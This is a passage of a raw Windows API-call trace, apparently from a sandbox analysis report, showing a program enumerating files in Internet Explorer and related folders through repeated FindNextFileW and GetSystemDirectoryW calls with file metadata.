ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa37b6f98, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="iecompat.dll", cAlternateFileName="")) returned 1 [0066.828] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa37b6f98, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa37b6f98, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa37dd0f9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xf7600, dwReserved0=0x0, dwReserved1=0x0, cFileName="iedvtool.dll", cAlternateFileName="")) returned 1 [0066.828] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa357baf4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa357baf4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa357baf4, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x41e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieinstal.exe", cAlternateFileName="")) returned 1 [0066.828] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdecd4578, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xdecd4578, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xe3cb04e0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x1c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ielowutil.exe", cAlternateFileName="")) returned 1 [0066.828] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3803259, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa3803259, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa3803259, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6e200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieproxy.dll", cAlternateFileName="")) returned 1 [0066.828] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa357baf4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa357baf4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa357baf4, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x47a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="IEShims.dll", cAlternateFileName="")) returned 1 [0066.828] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa387567a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa387567a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa387567a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa9b10, dwReserved0=0x0, dwReserved1=0x0, cFileName="iexplore.exe", cAlternateFileName="")) returned 1 [0066.828] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3686496, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa3686496, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa36ac5f7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x7b600, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdbgui.dll", cAlternateFileName="")) returned 1 [0066.828] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe54abd0a, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xe54abd0a, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x2b495380, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x23600, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdebuggeride.dll", cAlternateFileName="")) returned 1 [0066.828] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41a0e8a, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xe41a0e8a, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x2b4b9d70, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x20400, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSProfilerCore.dll", cAlternateFileName="")) returned 1 [0066.828] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa36ac5f7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa36ac5f7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa36ac5f7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x46400, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsprofilerui.dll", cAlternateFileName="")) returned 1 [0066.829] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x825d0f8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0x825d0f8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0x5909b005, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x579f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdbg2.dll", cAlternateFileName="")) returned 1 [0066.829] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x594eb7ab, ftCreationTime.dwHighDateTime=0x1c9ea0a, ftLastAccessTime.dwLowDateTime=0x594eb7ab, ftLastAccessTime.dwHighDateTime=0x1c9ea0a, ftLastWriteTime.dwLowDateTime=0x439e9300, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x83200, dwReserved0=0x0, dwReserved1=0x0, cFileName="pdm.dll", cAlternateFileName="")) returned 1 [0066.829] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x98d1a336, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98d1a336, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SIGNUP", cAlternateFileName="")) returned 1 [0066.829] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x855fc7e1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x855fc7e1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85622942, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0066.829] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x855fc7e1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x855fc7e1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85622942, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 0 [0066.829] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0066.829] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0066.829] CoTaskMemFree (pv=0x506980) [0066.830] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.830] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="hmmapi.dll.mui", cAlternateFileName="")) returned 1 [0066.830] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x0, cFileName="iedvtool.dll.mui", cAlternateFileName="")) returned 1 [0066.830] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieinstal.exe.mui", cAlternateFileName="")) returned 1 [0066.830] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ielowutil.exe.mui", cAlternateFileName="")) returned 1 [0066.830] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe647cb96, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe647cb96, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xe45e4000, ftLastWriteTime.dwHighDateTime=0x1ca042a, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="iexplore.exe.mui", cAlternateFileName="")) returned 1 [0066.830] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdbgui.dll.mui", cAlternateFileName="")) returned 1 [0066.830] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdebuggeride.dll.mui", cAlternateFileName="")) returned 1 [0066.830] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSProfilerCore.dll.mui", cAlternateFileName="")) returned 1 [0066.830] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsprofilerui.dll.mui", cAlternateFileName="")) returned 1 [0066.830] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0066.832] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.832] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="hmmapi.dll.mui", cAlternateFileName="")) returned 1 [0066.832] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x0, cFileName="iedvtool.dll.mui", cAlternateFileName="")) returned 1 [0066.832] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieinstal.exe.mui", cAlternateFileName="")) returned 1 [0066.832] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ielowutil.exe.mui", cAlternateFileName="")) returned 1 [0066.833] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe647cb96, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe647cb96, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0xe45e4000, ftLastWriteTime.dwHighDateTime=0x1ca042a, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="iexplore.exe.mui", cAlternateFileName="")) returned 1 [0066.833] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdbgui.dll.mui", cAlternateFileName="")) returned 1 [0066.833] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdebuggeride.dll.mui", cAlternateFileName="")) returned 1 [0066.833] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSProfilerCore.dll.mui", cAlternateFileName="")) returned 1 [0066.833] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsprofilerui.dll.mui", cAlternateFileName="")) returned 1 [0066.833] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsprofilerui.dll.mui", cAlternateFileName="")) returned 0 [0066.834] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0066.834] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0066.834] CoTaskMemFree (pv=0x506980) [0066.834] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x98d1a336, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98d1a336, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.834] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80471418, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf22307c6, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf22307c6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="install.ins", cAlternateFileName="")) returned 1 [0066.834] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0066.834] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x98d1a336, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98d1a336, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.834] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80471418, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf22307c6, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf22307c6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="install.ins", cAlternateFileName="")) returned 1 [0066.834] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80471418, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf22307c6, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf22307c6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="install.ins", cAlternateFileName="")) returned 0 [0066.835] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0066.835] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0066.835] CoTaskMemFree (pv=0x506980) [0066.835] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.835] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 1 [0066.835] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, 